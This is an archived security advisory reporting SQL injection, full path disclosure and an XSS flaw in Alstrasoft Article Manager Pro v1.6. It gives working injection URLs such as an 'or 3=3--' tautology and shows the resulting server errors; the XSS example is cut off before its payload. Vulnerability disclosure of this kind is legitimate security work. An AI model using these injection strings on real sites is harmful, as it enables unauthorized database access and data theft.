Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: b06-2407.htm

Alstrasoft Article Manager Pro v1.6



Alstrasoft Article Manager Pro v1.6
Alstrasoft Article Manager Pro v1.6



Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors=0D
=0D
Homepage:=0D
http://www.alstrasoft.com=0D 
=0D
Description:=0D
Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their website in a matter of minutes with our advance WYSIWYG editor that includes features such as a built-in spell checker, word finder and many more. =0D
=0D
Effected files:=0D
=0D
profile.php=0D
userarticles.php=0D
submit_article.php =0D
mraticles.php=0D
admin.php=0D
=0D
Exploits & Vulns:=0D
=0D
=0D
SQL Injection query error=0D
http://www.example.com/article/profile.php?author_id=1'=0D 
=0D
1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for =0D
=0D
the right syntax to use near '\'' at line 1=0D
=0D
=0D
SQL Injection:=0D
http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--=0D 
=0D
Proof Of Concept: =0D
All articles in DB appear on page when the above query is preformed.=0D
=0D
=0D
Full path errors=0D
=0D
http://www.example.com/article/userarticles.php?aut_id=3'=0D 
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html=0D
=0D
/article/functions.php on line 212=0D
Invalid user id supplied!=0D
=0D
=0D
http://www.example.com/article/mrarticles.php?action=read'=0D 
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html=0D
=0D
/article/mrarticles.php on line 50=0D
=0D
=0D
http://www.example.com/article/admin/admin.php?login=0D 
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html=0D
=0D
/article/admin/auth.php on line 18=0D
=0D
=0D
submit_article.php XSS Vuln.=0D
=0D
When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter =0D
=0D
something like 
=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH